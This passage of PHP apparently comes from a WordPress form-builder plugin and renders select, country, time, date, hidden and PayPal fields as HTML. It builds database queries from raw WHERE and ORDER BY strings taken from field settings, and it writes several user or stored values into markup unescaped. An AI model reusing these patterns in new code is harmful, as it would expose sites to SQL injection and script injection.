							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_allow_other'.$form_id.'\" value = \"'.$param['w_allow_other'].'\" />").appendTo("#form'.$form_id.'");

							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_allow_other_num'.$form_id.'\" value = \"'.$param['w_allow_other_num'].'\" />").appendTo("#adminForm");

							';

						

						break;

					}

            case 'type_own_select':

					{

					

						$params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_checked', 'w_choices_disabled','w_required','w_class');

						$temp=$params;

						if(strpos($temp, 'w_choices_value') > -1)

						$params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_checked', 'w_choices_disabled', 'w_required', 'w_value_disabled', 'w_choices_value', 'w_choices_params', 'w_class');

						

						foreach($params_names as $params_name )

						{	

							$temp=explode('*:*'.$params_name.'*:*',$temp);

							$param[$params_name] = $temp[0];

							$temp=$temp[1];

						}

						

						

						if($temp)

						{	

							$temp	=explode('*:*w_attr_name*:*',$temp);

							$attrs	= array_slice($temp,0, count($temp)-1);   

							foreach($attrs as $attr)

								$param['attributes'] = $param['attributes'].' '.$attr;

						}

						

					

						$wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	

						$param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	

						$param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");

					

						$param['w_choices']	= explode('***',$param['w_choices']);

						$param['w_choices_disabled']	= explode('***',$param['w_choices_disabled']);

						if(isset($param['w_choices_value']))

						{

							$param['w_choices_value'] = explode('***',$param['w_choices_value']);

							$param['w_choices_params'] = explode('***',$param['w_choices_params']);	

						}

						

						if(!isset($param['w_value_disabled']))

						$param['w_value_disabled'] = 'no';

						

						$rep='<div type="type_own_select" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';

						

						$rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.($param['w_size']).'px; "><select id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" style="width: 100%;"  '.$param['attributes'].'>';

						foreach($param['w_choices'] as $key => $choice)

						{

							if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])

							{

								$choices_labels =array();
							$choices_values = array();
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
							
							
								$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));

								$table = $label_table_and_column[0];

								$label_column = $label_table_and_column[1];

								if($label_column)

								{

									$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);

								}	



								$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_value'][$key]));

								$value_column = $param['w_choices_disabled'][$key]=="true" ? '' : $value_table_and_column[1];



								if($value_column)

								{

									$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);

								}	



								$columns_count = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);

								if(array_filter($choices_labels) || array_filter($choices_values))

									for($k=0; $k<$columns_count; $k++)

									{

										$choice_label = isset($choices_labels[$k]) ? $choices_labels[$k] : '';

										$choice_value = isset($choices_values[$k]) ? $choices_values[$k] : ($param['w_choices_disabled'][$key]=="true" ? '' : $choice_label);

									

										$selected=($element_value && htmlspecialchars($choice_value)==htmlspecialchars($element_value) ? 'selected="selected"' : '');



										$rep.='<option value="'.htmlspecialchars($choice_value).'" '.$selected.'>'.$choice_label.'</option>';

													

									}		

							}

							else

							{		

								$choice_value = $param['w_choices_disabled'][$key]=="true" ? '' : (isset($param['w_choices_value']) ? $param['w_choices_value'][$key] : $choice);

								

								$selected=($element_value && htmlspecialchars($choice_value)==htmlspecialchars($element_value) ? 'selected="selected"' : '');

	

								$rep.='<option value="'.htmlspecialchars($choice_value).'" '.$selected.'>'.$choice.'</option>';

							}  

						}

						$rep.='</select></div></div>';

						

						

						break;

					}
            
            case 'type_country': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_countries','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
              
              $param['w_countries']	= explode('***',$param['w_countries']);
              
              $selected='';
     
              $rep='<div type="type_country" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="width: '.$param['w_size'].'px;"><select id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" style="width: 100%;"  '.$param['attributes'].'>';
              foreach($param['w_countries'] as $key => $choice) {
                
                  $selected=(htmlspecialchars($choice)==htmlspecialchars($element_value) ? 'selected="selected"' : '');

                $choice_value=$choice;
                $rep.='<option value="'.$choice_value.'" '.$selected.'>'.$choice.'</option>';
              }
              $rep.='</select></div></div>';
                          
              break;
            }
            
            case 'type_time': {
              if($element_value =='')
                $element_value = ':';
                
                $params_names=array('w_field_label_size','w_field_label_pos','w_time_type','w_am_pm','w_sec','w_hh','w_mm','w_ss','w_mini_labels','w_required','w_class');
                $temp=$params;

                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }
                
                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' '.$attr;
                }
              
                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
              
                $w_mini_labels = explode('***',$param['w_mini_labels']);
                $element_value = explode(':',$element_value);
              
              
                $w_sec = '';
                $w_sec_label='';
                
                if($param['w_sec']=='1') {
                  $w_sec = '<div align="center" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></div><div style="display: table-cell;"><input type="text" value="'.(count($element_value)==2 ? '' : $element_value[2]).'" class="time_box" id="wdform_'.$id1.'_ss'.$form_id.'" name="wdform_'.$id1.'_ss'.$form_id.'" onkeypress="return check_second(event, &quot;wdform_'.$id1.'_ss'.$form_id.'&quot;)" '.$param['attributes'].'></div>';
                  
                  $w_sec_label='<div style="display: table-cell;"></div><div style="display: table-cell;"><label class="mini_label">'.$w_mini_labels[2].'</label></div>';
                }

                
                if($param['w_time_type']=='12') {
                  if(strpos($element_value[2],'pm')!==false) {
                    $am_ = "";
                    $pm_ = "selected=\"selected\"";	
                  }	
                  else {
                    $am_ = "selected=\"selected\"";
                    $pm_ = "";	
                  }	
                
                    $w_time_type = '<div style="display: table-cell;"><select class="am_pm_select" name="wdform_'.$id1.'_am_pm'.$form_id.'" id="wdform_'.$id1.'_am_pm'.$form_id.'" '.$param['attributes'].'><option value="am" '.$am_.'>AM</option><option value="pm" '.$pm_.'>PM</option></select></div>';
                
                    $w_time_type_label = '<div ><label class="mini_label">'.$w_mini_labels[3].'</label></div>';
                
                }
                else {
                  $w_time_type='';
                  $w_time_type_label = '';
                }
                          
                $rep ='<div type="type_time" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';"><div style="display: table;"><div style="display: table-row;"><div style="display: table-cell;"><input type="text" value="'.$element_value[0].'" class="time_box" id="wdform_'.$id1.'_hh'.$form_id.'" name="wdform_'.$id1.'_hh'.$form_id.'" onkeypress="return check_hour(event, &quot;wdform_'.$id1.'_hh'.$form_id.'&quot;, &quot;23&quot;)" '.$param['attributes'].'></div><div align="center" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></div><div style="display: table-cell;"><input type="text" value="'.$element_value[1].'" class="time_box" id="wdform_'.$id1.'_mm'.$form_id.'" name="wdform_'.$id1.'_mm'.$form_id.'" onkeypress="return check_minute(event, &quot;wdform_'.$id1.'_mm'.$form_id.'&quot;)" '.$param['attributes'].'></div>'.$w_sec.$w_time_type.'</div><div style="display: table-row;"><div style="display: table-cell;"><label class="mini_label">'.$w_mini_labels[0].'</label></div><div style="display: table-cell;"></div><div style="display: table-cell;"><label class="mini_label">'.$w_mini_labels[1].'</label></div>'.$w_sec_label.$w_time_type_label.'</div></div></div></div>';
                                
              break;
            }

            case 'type_date': {
                $params_names=array('w_field_label_size','w_field_label_pos','w_date','w_required','w_class','w_format','w_but_val');
                $temp = $params;
			    if(strpos($temp, 'w_disable_past_days') > -1)
				  $params_names = array('w_field_label_size','w_field_label_pos','w_date','w_required','w_class','w_format','w_but_val', 'w_disable_past_days');

                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }
                              
                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' '.$attr;
                }
                              
                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                
                $rep ='<div type="type_date" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';"><input type="text" value="'.$element_value.'" class="wdform-date" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" maxlength="10" '.$param['attributes'].'><input id="wdform_'.$id1.'_button'.$form_id.'" class="wdform-calendar-button" type="reset" value="'.$param['w_but_val'].'" format="'.$param['w_format'].'" onclick="return showCalendar(\'wdform_'.$id1.'_element'.$form_id.'\' , \'%Y-%m-%d\')"  '.$param['attributes'].' "></div></div>';
        
                
                // $onload_js.= 'Calendar.setup({inputField: "wdform_'.$id1.'_element'.$form_id.'",	ifFormat: "'.$param['w_format'].'",button: "wdform_'.$id1.'_button'.$form_id.'",align: "Tl",singleClick: true,firstDay: 0});';
                
              break;
            }

            case 'type_date_fields': {
              if($element_value=='')
                $element_value='--';
                
                $params_names=array('w_field_label_size','w_field_label_pos','w_day','w_month','w_year','w_day_type','w_month_type','w_year_type','w_day_label','w_month_label','w_year_label','w_day_size','w_month_size','w_year_size','w_required','w_class','w_from','w_to','w_divider');
                
                $temp=$params;

                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }
                
                
                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' '.$attr;
                }
                
                $element_value = explode('-',$element_value); 
                
                $param['w_day'] = (isset($_POST['wdform_'.$id1."_day".$form_id]) ? esc_html(stripslashes( $_POST['wdform_'.$id1."_day".$form_id])) : $param['w_day']);
                $param['w_month'] = (isset($_POST['wdform_'.$id1."_month".$form_id]) ? esc_html(stripslashes( $_POST['wdform_'.$id1."_month".$form_id])) : $element_value[1]);//??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
                $param['w_year'] = (isset($_POST['wdform_'.$id1."w_year".$form_id]) ? esc_html(stripslashes( $_POST['wdform_'.$id1."_year".$form_id])) : $param['w_year']);
                  
                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                
                if($param['w_day_type']=="SELECT") {
                
                  $w_day_type = '<select id="wdform_'.$id1.'_day'.$form_id.'" name="wdform_'.$id1.'_day'.$form_id.'" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].'><option value=""></option>';
                  
                  for($k=1; $k<=31; $k++) {
                  
                    if($k<10) {
                      if($element_value[0]=='0'.$k)
                      $selected = "selected=\"selected\"";
                      else
                      $selected = "";
                      
                      $w_day_type .= '<option value="0'.$k.'" '.$selected.'>0'.$k.'</option>';
                    }
                    else {
                      if($element_value[0]==''.$k)
                      $selected = "selected=\"selected\"";
                      else
                      $selected = "";
                      
                      $w_day_type .= '<option value="'.$k.'" '.$selected.'>'.$k.'</option>';
                    }
                    
                  }
                  $w_day_type .= '</select>';
                  
                }
                else {
                  $w_day_type = '<input type="text" value="'.$element_value[0].'" id="wdform_'.$id1.'_day'.$form_id.'" name="wdform_'.$id1.'_day'.$form_id.'" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].'>';
                  $onload_js .='jQuery("#wdform_'.$id1.'_day'.$form_id.'").blur(function() {if (jQuery(this).val()=="0") jQuery(this).val(""); else add_0(this)});';
                  $onload_js .='jQuery("#wdform_'.$id1.'_day'.$form_id.'").keypress(function() {return check_day(event, this)});';
                }
                
                
                if($param['w_month_type']=="SELECT") {
                
                      $w_month_type = '<select id="wdform_'.$id1.'_month'.$form_id.'" name="wdform_'.$id1.'_month'.$form_id.'" style="width: '.$param['w_month_size'].'px;" '.$param['attributes'].'><option value=""></option><option value="01" '.($param['w_month']=="01" ? "selected=\"selected\"": "").'  >'.(__("January", 'form_maker')).'</option><option value="02" '.($param['w_month']=="02" ? "selected=\"selected\"": "").'>'.(__("February", 'form_maker')).'</option><option value="03" '.($param['w_month']=="03"? "selected=\"selected\"": "").'>'.(__("March", 'form_maker')).'</option><option value="04" '.($param['w_month']=="04" ? "selected=\"selected\"": "").' >'.(__("April", 'form_maker')).'</option><option value="05" '.($param['w_month']=="05" ? "selected=\"selected\"": "").' >'.(__("May", 'form_maker')).'</option><option value="06" '.($param['w_month']=="06" ? "selected=\"selected\"": "").' >'.(__("June", 'form_maker')).'</option><option value="07" '.($param['w_month']=="07" ? "selected=\"selected\"": "").' >'.(__("July", 'form_maker')).'</option><option value="08" '.($param['w_month']=="08" ? "selected=\"selected\"": "").' >'.(__("August", 'form_maker')).'</option><option value="09" '.($param['w_month']=="09" ? "selected=\"selected\"": "").' >'.(__("September", 'form_maker')).'</option><option value="10" '.($param['w_month']=="10" ? "selected=\"selected\"": "").' >'.(__("October", 'form_maker')).'</option><option value="11" '.($param['w_month']=="11" ? "selected=\"selected\"": "").'>'.(__("November", 'form_maker')).'</option><option value="12" '.($param['w_month']=="12" ? "selected=\"selected\"": "").' >'.(__("December", 'form_maker')).'</option></select>';              
                }
                else {
                  $w_month_type = '<input type="text" value="'.$element_value[1].'" id="wdform_'.$id1.'_month'.$form_id.'" name="wdform_'.$id1.'_month'.$form_id.'"  style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].'>';
                  $onload_js .='jQuery("#wdform_'.$id1.'_month'.$form_id.'").blur(function() {if (jQuery(this).val()=="0") jQuery(this).val(""); else add_0(this)});';
                  $onload_js .='jQuery("#wdform_'.$id1.'_month'.$form_id.'").keypress(function() {return check_month(event, this)});';
                }
                
                
                if($param['w_year_type']=="SELECT" ) {
                  $w_year_type = '<select id="wdform_'.$id1.'_year'.$form_id.'" name="wdform_'.$id1.'_year'.$form_id.'"  from="'.$param['w_from'].'" to="'.$param['w_to'].'" style="width: '.$param['w_year_size'].'px;" '.$param['attributes'].'><option value=""></option>';
                  
                  for($k=$param['w_to']; $k>=$param['w_from']; $k--) {
                    if($element_value[2]==$k)
                    $selected = "selected=\"selected\"";
                    else
                    $selected = "";
                    
                    $w_year_type .= '<option value="'.$k.'" '.$selected.'>'.$k.'</option>';
                  }
                  $w_year_type .= '</select>';
                }
                else {
                  $w_year_type = '<input type="text" value="'.$element_value[2].'" id="wdform_'.$id1.'_year'.$form_id.'" name="wdform_'.$id1.'_year'.$form_id.'" from="'.$param['w_from'].'" to="'.$param['w_to'].'" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].'>';
                  $onload_js .='jQuery("#wdform_'.$id1.'_year'.$form_id.'").blur(function() {check_year2(this)});';
                  $onload_js .='jQuery("#wdform_'.$id1.'_year'.$form_id.'").keypress(function() {return check_year1(event, this)});';
                  $onload_js .='jQuery("#wdform_'.$id1.'_year'.$form_id.'").change(function() {change_year(this)});';
                }
                  
                $rep ='<div type="type_date_fields" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';"><div style="display: table;"><div style="display: table-row;"><div style="display: table-cell;">'.$w_day_type.'</div><div style="display: table-cell;"><span class="wdform_separator">'.$param['w_divider'].'</span></div><div style="display: table-cell;">'.$w_month_type.'</div><div style="display: table-cell;"><span class="wdform_separator">'.$param['w_divider'].'</span></div><div style="display: table-cell;">'.$w_year_type.'</div></div><div style="display: table-row;"><div style="display: table-cell;"><label class="mini_label">'.$param['w_day_label'].'</label></div><div style="display: table-cell;"></div><div style="display: table-cell;"><label class="mini_label" >'.$param['w_month_label'].'</label></div><div style="display: table-cell;"></div><div style="display: table-cell;"><label class="mini_label">'.$param['w_year_label'].'</label></div></div></div></div></div>';
                 
              break;
            }
    
            
            case 'type_hidden': {
              $params_names=array('w_name','w_value');
              $temp=$params;

              foreach($params_names as $params_name ) {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
                
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }
              
              $rep ='<div type="type_hidden" class="wdform-field"><div class="wdform-label-section" style="float:left; width: 150px;"><span class="wdform-label">' . $label . '</span></div><div class="wdform-element-section" style="display: table-cell;"><input type="text" value="'.$element_value.'" id="wdform_'.$id1.'_element'.$form_id.'" name="'.$param['w_name'].'" '.$param['attributes'].'></div></div>';
              
              break;
            }


            case 'type_paypal_price': {
              
                $params_names=array('w_field_label_size','w_field_label_pos','w_first_val','w_title', 'w_mini_labels','w_size','w_required','w_hide_cents','w_class','w_range_min','w_range_max');
                $temp=$params;

                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }
                
                
                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' '.$attr;
                }
                
                if (strpos($element_value,'.')!== false)
                  $element = explode('.',$element_value);
                else {
                  $element = Array();
                  $element[0] = preg_replace("/[^0-9]/","",$element_value);
                  $element[1] = '';
                }
                  
                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                
                $hide_cents = ($param['w_hide_cents']=="yes" ? "none;" : "table-cell;");	
                          
                $w_mini_labels = explode('***',$param['w_mini_labels']);
                
                $rep ='<div type="type_paypal_price" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                 
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';"><input type="hidden" value="'.$param['w_range_min'].'" name="wdform_'.$id1.'_range_min'.$form_id.'" id="wdform_'.$id1.'_range_min'.$form_id.'"><input type="hidden" value="'.$param['w_range_max'].'" name="wdform_'.$id1.'_range_max'.$form_id.'" id="wdform_'.$id1.'_range_max'.$form_id.'"><div id="wdform_'.$id1.'_table_price" style="display: table;"><div id="wdform_'.$id1.'_tr_price1" style="display: table-row;"><div id="wdform_'.$id1.'_td_name_currency" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;"><!--repstart-->&nbsp;'.$form_currency.'&nbsp;<!--repend--></span></div><div id="wdform_'.$id1.'_td_name_dollars" style="display: table-cell;"><input type="text" class="" id="wdform_'.$id1.'_element_dollars'.$form_id.'" name="wdform_'.$id1.'_element_dollars'.$form_id.'" value="'.(strpos($element_value,'.') !== false ? preg_replace("/[^0-9]/","",$element[0]) : $element[0]).'"  onkeypress="return check_isnum(event)" style="width: '.$param['w_size'].'px;" '.$param['attributes'].'></div><div id="wdform_'.$id1.'_td_name_divider" style="display: '.$hide_cents.';"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;.&nbsp;</span></div><div id="wdform_'.$id1.'_td_name_cents" style="display: '.$hide_cents.'"><input type="text" class="" id="wdform_'.$id1.'_element_cents'.$form_id.'" name="wdform_'.$id1.'_element_cents'.$form_id.'" value="'.(strpos($element_value,'.') !== false ? preg_replace("/[^0-9]/","",$element[1]) : " ").'"  style="width: 30px;" '.$param['attributes'].'></div></div><div id="wdform_'.$id1.'_tr_price2" style="display: table-row;"><div style="display: table-cell;"><label class="mini_label"></label></div><div align="left" style="display: table-cell;"><label class="mini_label">'.$w_mini_labels[0].'</label></div><div id="wdform_'.$id1.'_td_name_label_divider" style="display: '.$hide_cents.'"><label class="mini_label"></label></div><div align="left" id="wdform_'.$id1.'_td_name_label_cents" style="display: '.$hide_cents.'"><label class="mini_label">'.$w_mini_labels[1].'</label></div></div></div></div></div>';
                
                $onload_js .='jQuery("#wdform_'.$id1.'_element_cents'.$form_id.'").blur(function() {add_0(this)});';
                $onload_js .='jQuery("#wdform_'.$id1.'_element_cents'.$form_id.'").keypress(function() {return check_isnum_interval(event,this,0,99)});';
                
              break;
            }
            
            case 'type_paypal_select':

					{



						if($element_value=='')

							$element_value = ' :';

						

						$params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_price','w_choices_checked', 'w_choices_disabled','w_required','w_quantity','w_class','w_property','w_property_values');

						$temp=$params;



						if(strpos($temp, 'w_choices_params') > -1)

							$params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_price','w_choices_checked', 'w_choices_disabled','w_required','w_quantity', 'w_quantity_value', 'w_choices_params','w_class','w_property','w_property_values');

							

						foreach($params_names as $params_name )

						{	

							$temp=explode('*:*'.$params_name.'*:*',$temp);

							$param[$params_name] = $temp[0];

							$temp=$temp[1];

						}

						

						

						if($temp)

						{	

							$temp	=explode('*:*w_attr_name*:*',$temp);

							$attrs	= array_slice($temp,0, count($temp)-1);   

							foreach($attrs as $attr)

								$param['attributes'] = $param['attributes'].' '.$attr;

						}

						

					

						$wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	

						$param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	

						$param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");

						

						$param['w_choices']	= explode('***',$param['w_choices']);

						$param['w_choices_price']	= explode('***',$param['w_choices_price']);

						

						$param['w_choices_disabled']	= explode('***',$param['w_choices_disabled']);

						$param['w_property']	= explode('***',$param['w_property']);

						$param['w_property_values']	= explode('***',$param['w_property_values']);

						if(isset($param['w_choices_params']))

							$param['w_choices_params'] = explode('***',$param['w_choices_params']);	

						

						

						if(strpos($element_value,'***br***') !== false)

						{	

							$element_value	= explode('***br***',$element_value);

							if(count($element_value)==2)

							{

								if(strpos($element_value[1],'***quantity***') !== false)

								{

									$quantity_value = explode(': ',str_replace("***quantity***","",$element_value[1]));

									$quantity_value =  $quantity_value[1];

									$property_of_select = '';

								}

								else

								{

									$quantity_value = '' ;

									$property_of_select = explode(': ',str_replace("***property***","",$element_value[1]));

									$property_of_select = $property_of_select[1];

								}

								

								$element_value	= explode(' :',$element_value[0]);

								$choise_value = preg_replace("/[^0-9]/","",$element_value[1]);

							}

							else

							{

								$quantity_value = explode(': ',str_replace("***quantity***","",$element_value[1]));

								$quantity_value =  $quantity_value[1];

								$property_of_select = explode(': ',str_replace("***property***","",$element_value[2]));

								$property_of_select = $property_of_select[1];

								$element_value	= explode(' :',$element_value[0]);

								$choise_value = preg_replace("/[^0-9]/","",$element_value[1]);

							}

						}

						else

						{

							$element_value	= explode(' :',$element_value);

							$choise_value = preg_replace("/[^0-9]/","",$element_value[1]);

							$quantity_value = '';

							$property_of_select = '';

						}

						

					

						$rep='<div type="type_paypal_select" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';

						

						$rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].'; width: '.$param['w_size'].'px;"><select id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" style="width:100%;"  '.$param['attributes'].'>';

						foreach($param['w_choices'] as $key => $choice)

						{

							if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])

							{

								$choices_labels =array();
								$choices_values =array();
								$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
								$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
								$w_choices_params = explode('[db_info]',$w_choices_params[1]);
								$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
								$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
			
								
								$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));

								$table = $label_table_and_column[0];

								$label_column = $label_table_and_column[1];

								if($label_column)

								{

									$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);

								}	



								$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_price'][$key]));

								$value_column = $param['w_choices_disabled'][$key]=="true" ? '' : $value_table_and_column[1];



								if($value_column)

								{

									$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);

								}		

								

								$columns_count = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);

								

								for($k=0; $k<$columns_count; $k++)

								{

									$choice_label = isset($choices_labels[$k]) ? $choices_labels[$k] : '';

									$choice_value = isset($choices_values[$k]) ? (float)$choices_values[$k] : '';

									

									if($element_value[0] == $choice_label && $choice_value == $choise_value)

										$selected = 'selected="selected"';

									else

										$selected = '';	



									$rep.='<option value="'.$choice_value.'" '.$selected.'>'.$choice_label.'</option>';

								}			

							}

							else

							{

								if($param['w_choices_disabled'][$key]=="true")

									$choice_value='';

								else

									$choice_value=$param['w_choices_price'][$key];

									

								if($element_value[0] == $choice && $param['w_choices_price'][$key] == $choise_value)

									$selected = 'selected="selected"';

								else

									$selected = '';	

									

								$rep.='<option value="'.$choice_value.'" '.$selected.'>'.$choice.'</option>';

							

							}

						}

						$rep.='</select><div id="wdform_'.$id1.'_div'.$form_id.'">';

						if($param['w_quantity']=="yes")

						{

							$rep.='<div class="paypal-property"><label class="mini_label" style="margin: 0px 5px;">Quantity</label><input type="text" id="wdform_'.$id1.'_element_quantity'.$form_id.'" name="wdform_'.$id1.'_element_quantity'.$form_id.'" value="'.($quantity_value=="" ? 1 : $quantity_value).'"  class="wdform-quantity"></div>';

						}

						if($param['w_property'][0])					

						foreach($param['w_property'] as $key => $property)

						{

		

						$rep.='

						<div id="wdform_'.$id1.'_property_'.$key.'" class="paypal-property">

						<div style="width:150px; display:inline-block;">

						<label class="mini_label" id="wdform_'.$id1.'_property_label_'.$form_id.''.$key.'" style="margin-right: 5px;">'.$property.'</label>

						<select id="wdform_'.$id1.'_property'.$form_id.''.$key.'" name="wdform_'.$id1.'_property'.$form_id.''.$key.'" style="width: 100%; margin: 2px 0px;">';

						$param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);

						$param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   

						foreach($param['w_property_values'][$key] as $subkey => $property_value)

						{

							$rep.='<option id="wdform_'.$id1.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'" '.($property_of_select==$property_value ? 'selected="selected"' : "").'>'.$property_value.'</option>';

						}

						$rep.='</select></div></div>';

						}

						

						$rep.='</div></div></div>';

						



						$onsubmit_js.='

							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_label'.$form_id.'\"  />").val(jQuery("#wdform_'.$id1.'_element'.$form_id.' option:selected").text()).appendTo("#adminForm");

							';

						$onsubmit_js.='

